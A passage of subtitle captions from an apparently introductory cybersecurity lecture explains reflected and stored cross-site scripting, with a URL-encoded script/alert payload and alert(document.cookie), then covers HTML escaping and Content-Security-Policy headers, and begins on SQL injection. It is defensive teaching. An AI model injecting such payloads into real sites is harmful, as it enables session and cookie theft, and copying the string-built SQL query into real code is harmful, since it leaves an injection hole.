00:20:26,438 --> 00:20:27,980 It might actually be a little longer. 404 00:20:27,980 --> 00:20:30,980 But a lot of those parameters, so to speak, in the URL 405 00:20:30,980 --> 00:20:32,340 aren't strictly necessary. 406 00:20:32,340 --> 00:20:34,580 So this is the shortest possible URL that 407 00:20:34,580 --> 00:20:37,430 will work on Google if you want to search for cats. 408 00:20:37,430 --> 00:20:46,580 And notice what it is, https://www.google.com/search?q=cats. 409 00:20:46,580 --> 00:20:49,700 So this is to say that the way Google works is 410 00:20:49,700 --> 00:20:51,800 that if you want to search for cats, you simply 411 00:20:51,800 --> 00:20:53,233 visit a URL that looks like this. 412 00:20:53,233 --> 00:20:56,150 If you want to search for dogs, you visit a URL that looks almost like 413 00:20:56,150 --> 00:21:01,520 this, but instead has q=dogs, which is to say there's just a very standard 414 00:21:01,520 --> 00:21:04,670 format on google.com, and a lot of other websites too, 415 00:21:04,670 --> 00:21:09,050 for searching for things or really sending input to a web server. 416 00:21:09,050 --> 00:21:12,500 And this web form or this text box that you typically 417 00:21:12,500 --> 00:21:15,320 use to type in cats, or dogs, or anything else 418 00:21:15,320 --> 00:21:18,740 is just generating a URL that looks like this. 419 00:21:18,740 --> 00:21:20,850 And then Google knows what to do with it. 420 00:21:20,850 --> 00:21:25,310 So how can we leverage now that reality a little more maliciously? 421 00:21:25,310 --> 00:21:27,080 Well, let's go back to our HTML. 422 00:21:27,080 --> 00:21:29,300 And let's again assume that the adversarially 423 00:21:29,300 --> 00:21:32,300 is trying to construct some HTML for their own email 424 00:21:32,300 --> 00:21:37,190 or for their own website in order to attack some unsuspecting users. 425 00:21:37,190 --> 00:21:40,260 Well, instead of the dot, dot, dots, let's be more specific. 426 00:21:40,260 --> 00:21:43,370 Let's actually, in a good way, in an honest way, 427 00:21:43,370 --> 00:21:46,130 say that we're going to let the user click on a word 428 00:21:46,130 --> 00:21:49,190 cats, which is in between my open tag and close tag. 429 00:21:49,190 --> 00:21:52,490 And if they click on that, they're going to end up at the legitimate Google 430 00:21:52,490 --> 00:21:59,480 website where https://www.google.com/search?q=cats. 431 00:21:59,480 --> 00:22:00,480 So this is correct. 432 00:22:00,480 --> 00:22:02,030 This is not yet an attack. 433 00:22:02,030 --> 00:22:04,600 But what if I am a little malicious? 434 00:22:04,600 --> 00:22:09,220 And instead of using the legitimate URL there for searching for cats, 435 00:22:09,220 --> 00:22:12,400 suppose I construct something a little more cleverly 436 00:22:12,400 --> 00:22:16,330 that says we're going to give them cats, but actually, we're 437 00:22:16,330 --> 00:22:18,340 going to bring them to this URL. 438 00:22:18,340 --> 00:22:19,870 Now, this is a bit of a mouthful. 439 00:22:19,870 --> 00:22:22,240 And in fact, it wraps onto two lines this time. 440 00:22:22,240 --> 00:22:30,850 But notice the URL starts the same, https://www.google.com/search?q= 441 00:22:30,850 --> 00:22:39,310 and then some weird text, %3Cscript%3Ealert wrapping onto 442 00:22:39,310 --> 00:22:41,030 the other line and so forth. 443 00:22:41,030 --> 00:22:46,330 So I dare say, you're seeing some familiar phrases now, script and alert, 444 00:22:46,330 --> 00:22:49,160 but there's also some weird syntax there as well. 445 00:22:49,160 --> 00:22:53,470 Now, that weird syntax is just a representation of URL escaping. 446 00:22:53,470 --> 00:22:57,220 It turns out that certain characters in URLs, like angled brackets 447 00:22:57,220 --> 00:23:02,210 and other syntax is not good to include in URLs because it might be mistaken 448 00:23:02,210 --> 00:23:04,350 by the browser for something else. 449 00:23:04,350 --> 00:23:09,320 And so URLs typically escape punctuation symbols and other characters 450 00:23:09,320 --> 00:23:11,390 using this percent syntax. 451 00:23:11,390 --> 00:23:15,590 Now, it looks a little weird to the user, but what's more worrisome 452 00:23:15,590 --> 00:23:19,310 is what this is going to be used for on Google's end. 453 00:23:19,310 --> 00:23:24,830 If the q value equals this whole bunch of text 454 00:23:24,830 --> 00:23:29,240 and it's just the browser that's encoding those special characters 455 00:23:29,240 --> 00:23:32,630 in this way, what Google's really going to see on its end 456 00:23:32,630 --> 00:23:38,870 is the actual script tag with the actual alert and the actual close script tag 457 00:23:38,870 --> 00:23:40,760 that you and I constructed earlier. 458 00:23:40,760 --> 00:23:43,340 That is to say, what Google's going to receive 459 00:23:43,340 --> 00:23:48,300 from that URL is no longer "cats," quote, unquote, but this, quote, 460 00:23:48,300 --> 00:23:51,050 unquote, because the servers aren't going to automatically convert 461 00:23:51,050 --> 00:23:53,960 the percent signs and those weird characters back 462 00:23:53,960 --> 00:23:55,340 to the original automatically. 463 00:23:55,340 --> 00:23:57,210 That's how URL encoding works. 464 00:23:57,210 --> 00:24:00,000 So what the server is going to receive is this. 465 00:24:00,000 --> 00:24:04,850 And again, if the server is vulnerable to naively just outputting literally 466 00:24:04,850 --> 00:24:08,810 whatever the human typed in, the risk is that they're 467 00:24:08,810 --> 00:24:11,750 going to now execute that code. 468 00:24:11,750 --> 00:24:13,640 And what if the code isn't just an alert? 469 00:24:13,640 --> 00:24:17,060 Maybe it's something like this, which still isn't, in and of itself, 470 00:24:17,060 --> 00:24:19,550 a bad thing because it's just an alert. 471 00:24:19,550 --> 00:24:22,340 But this is actually some JavaScript code now, 472 00:24:22,340 --> 00:24:29,510 alert(document.cookie) that would actually throw up a dialog window that 473 00:24:29,510 --> 00:24:34,370 shows the user the value of the cookies they have there on Google's website. 474 00:24:34,370 --> 00:24:35,820 OK, not such a big deal. 475 00:24:35,820 --> 00:24:39,360 It's not all that different from just saying, quote, unquote, "attack." 476 00:24:39,360 --> 00:24:42,950 But what this means is that in JavaScript, 477 00:24:42,950 --> 00:24:47,060 you have access to all of the cookies for a website, at least, 478 00:24:47,060 --> 00:24:49,190 those that are made available to JavaScript. 479 00:24:49,190 --> 00:24:52,730 And if an adversarially doesn't use the alert function, 480 00:24:52,730 --> 00:24:58,250 but maybe uses a little more code to send the value of document.cookie 481 00:24:58,250 --> 00:25:03,290 to their own website or to somehow send other information from the web page, 482 00:25:03,290 --> 00:25:07,190 the user's username or any other personally identifying information, 483 00:25:07,190 --> 00:25:13,100 suffice it to say, that by being able to write code in JavaScript and by being 484 00:25:13,100 --> 00:25:17,000 able to trick a server like Google in this story into executing that code, 485 00:25:17,000 --> 00:25:23,510 you can effectively by transitivity trick a user's browser into executing 486 00:25:23,510 --> 00:25:25,530 that code for you. 487 00:25:25,530 --> 00:25:28,430 So the adversarially is sending the code into Google, 488 00:25:28,430 --> 00:25:31,220 and it's being reflected back to some user 489 00:25:31,220 --> 00:25:34,610 if they click that same link in an email or a website. 490 00:25:34,610 --> 00:25:38,850 And at this point, things like their own cookies might be vulnerable. 491 00:25:38,850 --> 00:25:42,270 And again, to be clear, this, in and of itself, should not hurt you. 492 00:25:42,270 --> 00:25:46,100 I'm just using alert as demonstrative of what could be possible. 493 00:25:46,100 --> 00:25:48,200 But you could do any number of other things 494 00:25:48,200 --> 00:25:51,320 with document.cookie or other values from a web page 495 00:25:51,320 --> 00:25:55,610 as soon as you have this ability to write JavaScript that's reflected back 496 00:25:55,610 --> 00:25:57,680 into someone else's browser. 497 00:25:57,680 --> 00:26:02,130 Any questions then on this particular attack? 498 00:26:02,130 --> 00:26:05,500 AUDIENCE: I just wanted to ask a question about the JavaScript blockage 499 00:26:05,500 --> 00:26:09,700 because many of the browsers [INAUDIBLE] uses to block the JavaScript. 500 00:26:09,700 --> 00:26:12,580 How can you use the websites and browser which 501 00:26:12,580 --> 00:26:16,193 blocks the JavaScript without getting tricked into the JavaScript? 502 00:26:16,193 --> 00:26:18,110 DAVID J. MALAN: That's a really good question. 503 00:26:18,110 --> 00:26:20,800 And the short answer is nowadays that that's not really 504 00:26:20,800 --> 00:26:22,930 the best technique to just block JavaScript. 505 00:26:22,930 --> 00:26:27,610 The reality is in this point in time, so many websites, most websites, 506 00:26:27,610 --> 00:26:32,200 dare say, use, if not, rely on JavaScript to do any number of features 507 00:26:32,200 --> 00:26:33,880 or render their own content. 508 00:26:33,880 --> 00:26:39,155 And so it's just, I think, not realistic to just disable JavaScript 509 00:26:39,155 --> 00:26:41,530 in order to protect yourself from these kinds of attacks. 510 00:26:41,530 --> 00:26:44,890 In a bit, we'll discuss ways to mitigate this kind of attack, where you 511 00:26:44,890 --> 00:26:47,470 disable some JavaScript, but not all. 512 00:26:47,470 --> 00:26:51,400 But in general, I don't think that's a realistic solution, at least, 513 00:26:51,400 --> 00:26:54,040 on most websites nowadays. 514 00:26:54,040 --> 00:26:57,130 So how else might these same principles be misused? 515 00:26:57,130 --> 00:27:00,520 Well, it turns out there's another class of attacks known as stored attacks, 516 00:27:00,520 --> 00:27:04,630 whereby, the adversary's input isn't just immediately reflected back 517 00:27:04,630 --> 00:27:07,180 from the server to some unsuspecting user 518 00:27:07,180 --> 00:27:10,960 as it might be when you're using the URL to contain the code. 519 00:27:10,960 --> 00:27:15,190 But suppose that a website were vulnerable to actually storing 520 00:27:15,190 --> 00:27:18,790 the user's input, even if the user's input includes 521 00:27:18,790 --> 00:27:22,427 HTML with some JavaScript inside, well, that would be a stored attack. 522 00:27:22,427 --> 00:27:23,635 And it might work as follows. 523 00:27:23,635 --> 00:27:28,180 And at the risk of picking on Google, suppose that-- when using Gmail, 524 00:27:28,180 --> 00:27:32,975 suppose that you, if you sent someone an email with that exact same code, 525 00:27:32,975 --> 00:27:35,350 whereby, you're just alerting, quote, unquote, "attack--" 526 00:27:35,350 --> 00:27:37,767 again, that, in and of itself, isn't going to hurt anyone. 527 00:27:37,767 --> 00:27:40,090 But it's representative of what you could do with code. 528 00:27:40,090 --> 00:27:43,720 Now, presumably, when you send an email in Gmail, or Outlook, 529 00:27:43,720 --> 00:27:47,770 or any other service, that email is going to be stored on a server 530 00:27:47,770 --> 00:27:50,860 until it's read and until it's deleted, perhaps, by the user. 531 00:27:50,860 --> 00:27:53,810 And if it's never deleted, it's going to stay stored on the server. 532 00:27:53,810 --> 00:27:56,950 So this type of attack assumes that the server might actually 533 00:27:56,950 --> 00:28:00,940 be saving in a database or a file somewhere the user's input. 534 00:28:00,940 --> 00:28:03,770 Now, suppose that here, too, Google didn't 535 00:28:03,770 --> 00:28:07,290 know about these kinds of cross-site scripting attacks, 536 00:28:07,290 --> 00:28:11,600 and they just allow you and me to input HTML and JavaScript into an email, 537 00:28:11,600 --> 00:28:14,580 and they just blindly save it into their database. 538 00:28:14,580 --> 00:28:17,180 And then when the recipient opens this email, 539 00:28:17,180 --> 00:28:20,820 they just show the recipient the contents of that email. 540 00:28:20,820 --> 00:28:22,200 Well, what could go wrong? 541 00:28:22,200 --> 00:28:26,150 Well, if the recipient opens that particular email and Google is 542 00:28:26,150 --> 00:28:29,540 literally rendering the script tag with the JavaScript inside, 543 00:28:29,540 --> 00:28:32,810 the recipient of that email, when they open their inbox, 544 00:28:32,810 --> 00:28:35,450 may very well suffer some kind of an attack. 545 00:28:35,450 --> 00:28:37,380 Again, it just says attack on the screen. 546 00:28:37,380 --> 00:28:41,990 But it represents being tricked into running code that someone else wrote, 547 00:28:41,990 --> 00:28:44,270 and in this case, someone else sent you. 548 00:28:44,270 --> 00:28:46,940 Ideally, what we would want to have happen instead 549 00:28:46,940 --> 00:28:50,820 is not have Google show us the attack message here. 550 00:28:50,820 --> 00:28:54,770 But rather, I would like my inbox to show me the code I was sent, 551 00:28:54,770 --> 00:28:56,210 but not execute it. 552 00:28:56,210 --> 00:29:00,380 That is, just like I wanted to know that there are 6,420,000,000 553 00:29:00,380 --> 00:29:03,500 cats among the search results, so would I 554 00:29:03,500 --> 00:29:08,090 want Gmail to just show me what it is the adversarially typed in 555 00:29:08,090 --> 00:29:11,120 without actually interpreting it or executing it 556 00:29:11,120 --> 00:29:14,090 as HTML with some JavaScript inside. 557 00:29:14,090 --> 00:29:19,010 So that could be a stored attack and would be a stored attack 558 00:29:19,010 --> 00:29:22,940 if, thankfully, Google weren't actually protecting us 559 00:29:22,940 --> 00:29:24,480 against this, which they are. 560 00:29:24,480 --> 00:29:27,870 So how do you go about preventing an attack like this in software? 561 00:29:27,870 --> 00:29:30,740 Well, the general answer is character escapes. 562 00:29:30,740 --> 00:29:34,280 That is taking any characters in user's input 563 00:29:34,280 --> 00:29:39,350 that might potentially be misinterpreted at best, or at worst, 564 00:29:39,350 --> 00:29:41,970 might be dangerous to the users. 565 00:29:41,970 --> 00:29:44,000 Now, what characters might be worrisome? 566 00:29:44,000 --> 00:29:47,420 Well, in something like HTML, anything with an angled bracket, 567 00:29:47,420 --> 00:29:50,210 a less than sign, would probably potentially 568 00:29:50,210 --> 00:29:53,310 be mistaken for the beginning of an HTML tag. 569 00:29:53,310 --> 00:29:58,250 So I dare say that a less than sign is a dangerous character, similarly 570 00:29:58,250 --> 00:30:01,580 might a greater than sign represent the end of a tag. 571 00:30:01,580 --> 00:30:04,070 So that, too, might be something to give us concern. 572 00:30:04,070 --> 00:30:06,570 And there's probably a few other characters as well. 573 00:30:06,570 --> 00:30:09,260 So what should servers be doing? 574 00:30:09,260 --> 00:30:14,480 What should software be doing to avoid this kind of cross-site scripting 575 00:30:14,480 --> 00:30:16,430 attacks, whether reflected or stored? 576 00:30:16,430 --> 00:30:19,730 Well, ideally, something like this would not just 577 00:30:19,730 --> 00:30:25,040 be blindly outputted by Google or by / but rather, it 578 00:30:25,040 --> 00:30:28,250 would be escaped in this very weird looking way. 579 00:30:28,250 --> 00:30:30,830 But let me highlight just a subset of these characters. 580 00:30:30,830 --> 00:30:34,400 Highlighted in yellow now are only the character escapes 581 00:30:34,400 --> 00:30:35,510 to which I'm referring. 582 00:30:35,510 --> 00:30:40,580 It turns out that this language, HTML, has standardized some special sequences 583 00:30:40,580 --> 00:30:43,760 of characters that represent the less than sign, 584 00:30:43,760 --> 00:30:45,800 that represent the greater than sign. 585 00:30:45,800 --> 00:30:47,780 They're a little more verbose to type. 586 00:30:47,780 --> 00:30:50,720 You have to type out four characters in this particular case. 587 00:30:50,720 --> 00:30:56,510 But browsers are designed to know that when they see <, 588 00:30:56,510 --> 00:30:59,780 they should not show on the screen <. 589 00:30:59,780 --> 00:31:01,700 They should show a less than sign. 590 00:31:01,700 --> 00:31:07,280 And similarly, when browsers see >, they should display not literally that, 591 00:31:07,280 --> 00:31:09,120 but a greater than sign. 592 00:31:09,120 --> 00:31:14,780 So this is to say, if Google were smart, they would take any user input you 593 00:31:14,780 --> 00:31:17,000 and I give them, but they would make sure 594 00:31:17,000 --> 00:31:22,520 to escape any potentially dangerous characters with these kinds of escape 595 00:31:22,520 --> 00:31:24,153 sequences, so to speak. 596 00:31:24,153 --> 00:31:26,570 And Google's got to look it up in a book, or on a website, 597 00:31:26,570 --> 00:31:30,230 or in the specification to know what escape they should use. 598 00:31:30,230 --> 00:31:33,320 But these are very well documented and standardized. 599 00:31:33,320 --> 00:31:37,310 And indeed, we have one here, one, one here for the open script tag and then 600 00:31:37,310 --> 00:31:40,130 another here and here for the closed script tag. 601 00:31:40,130 --> 00:31:44,285 But notice, we don't have to escape all of the punctuation, like the slash, 602 00:31:44,285 --> 00:31:47,210 or the English letters in the tag name, or the like. 603 00:31:47,210 --> 00:31:51,960 We're only escaping a certain list of these characters. 604 00:31:51,960 --> 00:31:53,030 Well, what is that list? 605 00:31:53,030 --> 00:31:56,150 Here are the five that minimally, we should generally 606 00:31:56,150 --> 00:31:58,220 be escaping depending on the context. 607 00:31:58,220 --> 00:32:02,820 The less than sign should be & lt;, the greater than sign. 608 00:32:02,820 --> 00:32:06,930 The ampersand sign, for the very reason that we're now potentially creating 609 00:32:06,930 --> 00:32:09,720 a new problem-- if we're using ampersand over the place, 610 00:32:09,720 --> 00:32:11,775 what if the user's input has an ampersand? 611 00:32:11,775 --> 00:32:16,090 We don't want to confuse the ampersand in the user's input for a character 612 00:32:16,090 --> 00:32:16,590 escape. 613 00:32:16,590 --> 00:32:21,690 So there actually needs to be a more verbose way, &amp; 614 00:32:21,690 --> 00:32:23,760 to represent literally an ampersand. 615 00:32:23,760 --> 00:32:32,820 Then there's one for a double quote, " and a single quote or apostrophe, '. 616 00:32:32,820 --> 00:32:34,060 And there's more as well. 617 00:32:34,060 --> 00:32:37,630 But generally, these are the five that could otherwise get you in trouble. 618 00:32:37,630 --> 00:32:40,830 So all of the examples we've seen thus far where Google is somehow 619 00:32:40,830 --> 00:32:43,440 reflecting back or storing potential attack code 620 00:32:43,440 --> 00:32:47,130 will not happen if Google is just smart, whereby, 621 00:32:47,130 --> 00:32:51,360 they're escaping that input from a user before sending 622 00:32:51,360 --> 00:32:58,210 it back out as output to google.com search results or to Gmail inboxes. 623 00:32:58,210 --> 00:33:01,170 So how else might we actually prevent attacks like these? 624 00:33:01,170 --> 00:33:04,210 Well, we can also put in place other measures as well. 625 00:33:04,210 --> 00:33:08,160 And recall from past classes we discussed this notion of HTTP headers. 626 00:33:08,160 --> 00:33:11,220 And an HTTP header is a line of text that's 627 00:33:11,220 --> 00:33:13,320 stored in those virtual envelopes that get 628 00:33:13,320 --> 00:33:16,530 sent from browsers to servers and from servers to browsers. 629 00:33:16,530 --> 00:33:20,190 Inside of the envelope typically is the actual request for a web page 630 00:33:20,190 --> 00:33:23,400 or the actual contents of, the response for a web page. 631 00:33:23,400 --> 00:33:26,070 But also in those envelopes are additional information, 632 00:33:26,070 --> 00:33:28,770 namely, these HTTP headers, which are key value 633 00:33:28,770 --> 00:33:31,810 pairs that provide additional instructions, if you will, 634 00:33:31,810 --> 00:33:33,330 to the browser or server. 635 00:33:33,330 --> 00:33:40,200 So for instance, suppose that we want to ensure that this kind of reflected 636 00:33:40,200 --> 00:33:44,280 or stored attack isn't possible, whereby, we're accidentally embedding 637 00:33:44,280 --> 00:33:48,090 script tags in our own website's HTML. 638 00:33:48,090 --> 00:33:49,840 Well, suppose that the website in question 639 00:33:49,840 --> 00:33:53,520 now isn't google.com specifically, but more generally, example.com. 640 00:33:53,520 --> 00:33:58,990 And suppose that example.com's web server is configured to output always 641 00:33:58,990 --> 00:34:01,930 in those virtual envelopes an HTTP header that 642 00:34:01,930 --> 00:34:05,500 is Content-Security-Policy:. 643 00:34:05,500 --> 00:34:07,570 So that string of text is the key. 644 00:34:07,570 --> 00:34:13,900 And the value of that key is script-src then the URL 645 00:34:13,900 --> 00:34:17,889 that we want to allow scripts from only. 646 00:34:17,889 --> 00:34:19,120 So what does this mean? 647 00:34:19,120 --> 00:34:24,340 Albeit, fairly cryptic, if you configure a web server with this HTTP header, 648 00:34:24,340 --> 00:34:30,130 this will ensure that you can only load JavaScript code from actual files, 649 00:34:30,130 --> 00:34:34,719 typically ending in .js that are sent separately from the server 650 00:34:34,719 --> 00:34:35,840 to the browser. 651 00:34:35,840 --> 00:34:41,300 This line of an HTTP header prevents inline scripts, so to speak. 652 00:34:41,300 --> 00:34:45,699 Whereby it allows the browser to execute any old script tag in the web page, 653 00:34:45,699 --> 00:34:49,040 this prevents that default behavior. 654 00:34:49,040 --> 00:34:53,590 So as such, even if Google, even if example.com messes up and forgets 655 00:34:53,590 --> 00:34:58,870 to use character escapes when rendering user input that came from a URL 656 00:34:58,870 --> 00:35:00,910 or came from an email or any other source, 657 00:35:00,910 --> 00:35:03,400 this header should at least tell the browser, at least, 658 00:35:03,400 --> 00:35:04,930 newer browsers, uh-uh. 659 00:35:04,930 --> 00:35:10,000 Even if you accidentally see a script tag with some JavaScript inside of it 660 00:35:10,000 --> 00:35:12,910 in my web page, don't execute it. 661 00:35:12,910 --> 00:35:18,490 Only allow me to execute JavaScript code that came from a separate file. 662 00:35:18,490 --> 00:35:21,220 The only type of JavaScript that will now be allowed 663 00:35:21,220 --> 00:35:24,520 is if I have a tag that looks like this in my HTML, which 664 00:35:24,520 --> 00:35:27,220 is an alternative version of the script tag. 665 00:35:27,220 --> 00:35:31,570 But instead of embedding any code inside of the open tag and the close tag 666 00:35:31,570 --> 00:35:37,240 itself, it refers to the source of, abbreviated src, some file, typically, 667 00:35:37,240 --> 00:35:38,800 again ending in .js. 668 00:35:38,800 --> 00:35:43,180 So if this dot, dot, dot were the URL of a file that 669 00:35:43,180 --> 00:35:46,660 contains JavaScript code, that would be allowed because the presumption 670 00:35:46,660 --> 00:35:49,690 there is that if someone went through the trouble of creating 671 00:35:49,690 --> 00:35:53,980 that file on our own server, example.com, presumably, 672 00:35:53,980 --> 00:35:55,000 that code is safe. 673 00:35:55,000 --> 00:35:58,000 But what this line in our header does is it 674 00:35:58,000 --> 00:36:01,960 ensures that we can only execute JavaScript code if it comes 675 00:36:01,960 --> 00:36:04,540 from example.com in a separate file. 676 00:36:04,540 --> 00:36:07,960 Using an HTML tag like this, it will prohibit 677 00:36:07,960 --> 00:36:12,400 that HTTP header any script tags that are inlined 678 00:36:12,400 --> 00:36:15,790 in the body of our actual web pages. 679 00:36:15,790 --> 00:36:16,970 What else can we do? 680 00:36:16,970 --> 00:36:19,300 Well, it turns out-- and we haven't talked about it in this class. 681 00:36:19,300 --> 00:36:22,175 There's other languages that you can use in the context of web pages, 682 00:36:22,175 --> 00:36:25,090 not only HTML, not only JavaScript, but also a language 683 00:36:25,090 --> 00:36:27,670 called CSS, or Cascading Style Sheets, which 684 00:36:27,670 --> 00:36:29,650 is generally used to style your page. 685 00:36:29,650 --> 00:36:33,070 If familiar, or if you take a course on web development, 686 00:36:33,070 --> 00:36:35,920 know that there's similarly a mechanism whereby 687 00:36:35,920 --> 00:36:41,410 you can specify that only CSS from a specific server like example.com 688 00:36:41,410 --> 00:36:45,370 should be allowed either, not inline style tags 689 00:36:45,370 --> 00:36:47,450 with which you might be familiar as well. 690 00:36:47,450 --> 00:36:52,270 So here instead of script source, we see style source, which is just another way 691 00:36:52,270 --> 00:36:57,610 using this HTTP header mechanism to just ensure that the browser, at least, 692 00:36:57,610 --> 00:37:00,880 if it's new enough, will not blindly execute script 693 00:37:00,880 --> 00:37:05,110 tags in the first case or style tags in the second case when 694 00:37:05,110 --> 00:37:06,850 these kinds of headers are present. 695 00:37:06,850 --> 00:37:10,210 It's an additional layer of defense against these kinds 696 00:37:10,210 --> 00:37:12,580 of reflected or stored attacks. 697 00:37:12,580 --> 00:37:15,490 Indeed, that particular HTTP header would only 698 00:37:15,490 --> 00:37:18,790 allow us to conclude CSS in our web page if it 699 00:37:18,790 --> 00:37:22,240 uses a tag like this, namely, a link tag with an href value. 700 00:37:22,240 --> 00:37:26,950 That dot, dot, dot of which in this case would be the URL of a CSS file 701 00:37:26,950 --> 00:37:30,490 on the particular server, example.com, the relationship 702 00:37:30,490 --> 00:37:35,170 of which is to the page that of this thing called a style sheet. 703 00:37:35,170 --> 00:37:38,680 Questions, then, on this use of HTTP headers 704 00:37:38,680 --> 00:37:42,910 to prevent these kinds of stored or reflected attacks or anything 705 00:37:42,910 --> 00:37:44,200 else thus far? 706 00:37:44,200 --> 00:37:48,463 AUDIENCE: What do the backslash P and backslash A [INAUDIBLE] sequence do? 707 00:37:48,463 --> 00:37:49,630 DAVID J. MALAN: Backslash P? 708 00:37:49,630 --> 00:37:52,000 Oh, in the HTML. 709 00:37:52,000 --> 00:37:58,060 So recall that a lot of our tags have open tags and close tags and the slash. 710 00:37:58,060 --> 00:38:00,160 It's actually a forward, not a backslash. 711 00:38:00,160 --> 00:38:04,310 The forward here just finishes the thought for the browser. 712 00:38:04,310 --> 00:38:05,620 So this starts the tag. 713 00:38:05,620 --> 00:38:06,940 This ends the tag. 714 00:38:06,940 --> 00:38:11,650 And you use the same word, script in this case, script in this case or A, 715 00:38:11,650 --> 00:38:13,450 or P, as you described. 716 00:38:13,450 --> 00:38:18,470 That is what closes or ends the tag in question, 717 00:38:18,470 --> 00:38:23,070 so that you know where the tag ends or where the paragraph ends. 718 00:38:23,070 --> 00:38:24,870 Other questions? 719 00:38:24,870 --> 00:38:27,480 AUDIENCE: Pertaining that React framework, as far 720 00:38:27,480 --> 00:38:32,460 as I understand [INAUDIBLE] format, you use interchangeably 721 00:38:32,460 --> 00:38:36,720 both JavaScript and HTML, how that isn't a security 722 00:38:36,720 --> 00:38:39,672 risk for these kind of attacks? 723 00:38:39,672 --> 00:38:41,880 DAVID J. MALAN: Really good question beyond the scope 724 00:38:41,880 --> 00:38:44,830 of this class for those who don't have a programming background. 725 00:38:44,830 --> 00:38:48,450 However, yes, React and other frameworks use a technique 726 00:38:48,450 --> 00:38:51,690 called JSX, which combines JavaScript with HTML 727 00:38:51,690 --> 00:38:54,270 with CSS that are rendered by the browser. 728 00:38:54,270 --> 00:38:57,270 In that case, though, Mateo, the browser is 729 00:38:57,270 --> 00:39:01,230 running JavaScript code that comes from the React library that 730 00:39:01,230 --> 00:39:05,760 is reading as input that JSX code and converting it 731 00:39:05,760 --> 00:39:10,690 to the resulting code that should be executed within the browser. 732 00:39:10,690 --> 00:39:16,440 So long as all of that code comes from .js files, or .css files, or the like, 733 00:39:16,440 --> 00:39:17,380 all is well. 734 00:39:17,380 --> 00:39:20,640 But if you just inline it and you're outputting headers like this, 735 00:39:20,640 --> 00:39:22,180 it won't execute at all. 736 00:39:22,180 --> 00:39:23,650 So the same rules apply. 737 00:39:23,650 --> 00:39:26,240 You would have to use an external file. 738 00:39:26,240 --> 00:39:29,470 So when it comes to code injection, there are other types of attacks, 739 00:39:29,470 --> 00:39:32,140 particularly, in the context of what's called SQL, 740 00:39:32,140 --> 00:39:35,350 or Structured Query Language, which is a language that's typically used 741 00:39:35,350 --> 00:39:37,940 with databases, so again, on a server. 742 00:39:37,940 --> 00:39:41,380 So let's consider how you might also trick software 743 00:39:41,380 --> 00:39:44,830 into executing SQL code, that is, code written 744 00:39:44,830 --> 00:39:48,280 in this particular language, when it comes to databases specifically. 745 00:39:48,280 --> 00:39:51,790 Well, here, for instance, is some representative code in this language 746 00:39:51,790 --> 00:39:56,680 called SQL, whereby, you have a line like SELECT * FROM users WHERE 747 00:39:56,680 --> 00:40:00,940 username= quote, unquote and then username in curly braces. 748 00:40:00,940 --> 00:40:03,310 Now, consider this to be pseudo code of sorts 749 00:40:03,310 --> 00:40:08,470 because I'm mixing some SQL syntax with some Python syntax in this case 750 00:40:08,470 --> 00:40:12,520 because it turns out that when you're using this language, SQL or SQL, 751 00:40:12,520 --> 00:40:15,910 you typically use it in combination with some other language, 752 00:40:15,910 --> 00:40:19,420 be it Python, or PHP, or Java, or something else. 753 00:40:19,420 --> 00:40:21,370 And you use that other language typically 754 00:40:21,370 --> 00:40:26,600 to construct queries dynamically based on values that humans have typed in. 755 00:40:26,600 --> 00:40:29,140 So for instance, if you're logging into a website 756 00:40:29,140 --> 00:40:31,480 and you type in your username and hit Enter, 757 00:40:31,480 --> 00:40:36,280 very often, if that website is implemented in Python, or PHP, or Java, 758 00:40:36,280 --> 00:40:41,440 it might use one of those languages to construct a SQL query that is then 759 00:40:41,440 --> 00:40:44,800 actually sent to the database to look up that specific user who's 760 00:40:44,800 --> 00:40:46,070 trying to log in. 761 00:40:46,070 --> 00:40:49,450 So what I have here then is mostly SQL syntax, 762 00:40:49,450 --> 00:40:54,070 except for in these curly braces some Python-specific syntax. 763 00:40:54,070 --> 00:40:57,580 And what this curly brace with username inside of it represents 764 00:40:57,580 --> 00:41:02,320 is hey, server, plug in whatever the human typed in as their username 765 00:41:02,320 --> 00:41:03,920 into that part of the string. 766 00:41:03,920 --> 00:41:06,460 So the curly braces and the word username 767 00:41:06,460 --> 00:41:09,460 should be replaced with literally something like Malan 768 00:41:09,460 --> 00:41:12,100 if that is the user who's trying to log in. 769 00:41:12,100 --> 00:41:15,850 And that will then resulting-- the resulting code will 770 00:41:15,850 --> 00:41:17,950 be sent to the database to select everything 771 00:41:17,950 --> 00:41:21,850 we know from the user's table, so to speak, in that database 772 00:41:21,850 --> 00:41:23,960 about that particular username. 773 00:41:23,960 --> 00:41:26,360 So what could potentially go wrong here? 774 00:41:26,360 --> 00:41:30,520 Well, it all has to do with, again, trusting input from the user. 775 00:41:30,520 --> 00:41:32,560 And that should now be emerging as a theme. 776 00:41:32,560 --> 00:41:37,797 You should generally always mistrust input that comes from users. 777 00:41:37,797 --> 00:41:39,130 You should do something with it. 778 00:41:39,130 --> 00:41:43,000 But you should sanitize it or scrub it in such a way, 779 00:41:43,000 --> 00:41:46,120 that any potentially dangerous characters are somehow escaped. 780 00:41:46,120 --> 00:41:49,990 And that's exactly what the solution was to those cross-site scripting 781 00:41:49,990 --> 00:41:53,440 attacks, whereby, so long as we escaped the user's input 782 00:41:53,440 --> 00:41:56,860 and changed the less than sign, and the greater than sign, and maybe 783 00:41:56,860 --> 00:42:00,580 some other symbols as well to the equivalent character escapes, 784 00:42:00,580 --> 00:42:02,090 all was well. 785 00:42:02,090 --> 00:42:04,870 So here, too, is an example now in the context of databases 786 00:42:04,870 --> 00:42:09,340 where a bit of paranoia will go a long way to keeping your software secure. 787 00:42:09,340 --> 00:42:10,150 Why? 788 00:42:10,150 --> 00:42:13,420 Well, suppose that my username is, indeed, Malan, 789 00:42:13,420 --> 00:42:16,180 but suppose that's not what I type into the website 790 00:42:16,180 --> 00:42:17,900 when trying to log in, for instance. 791 00:42:17,900 --> 00:42:21,010 So instead of typing just my username, suppose 792 00:42:21,010 --> 00:42:24,460 I am suspicious as the adversarially that this website is probably 793 00:42:24,460 --> 00:42:25,540 using a database. 794 00:42:25,540 --> 00:42:28,210 And that database is probably using this language, SQL. 795 00:42:28,210 --> 00:42:32,380 So what could I do to kind of mess with the owners of this website 796 00:42:32,380 --> 00:42:36,670 and try to trick their database into executing my code 797 00:42:36,670 --> 00:42:38,510 and not just their own? 798 00:42:38,510 --> 00:42:40,180 How do I inject code of my own? 799 00:42:40,180 --> 00:42:43,180 Well, instead of Malan, let me a little cryptically type 800 00:42:43,180 --> 00:42:46,690 this in to the website where I'm prompted for my username. 801 00:42:46,690 --> 00:42:48,250 Now, this does look cryptic. 802 00:42:48,250 --> 00:42:50,200 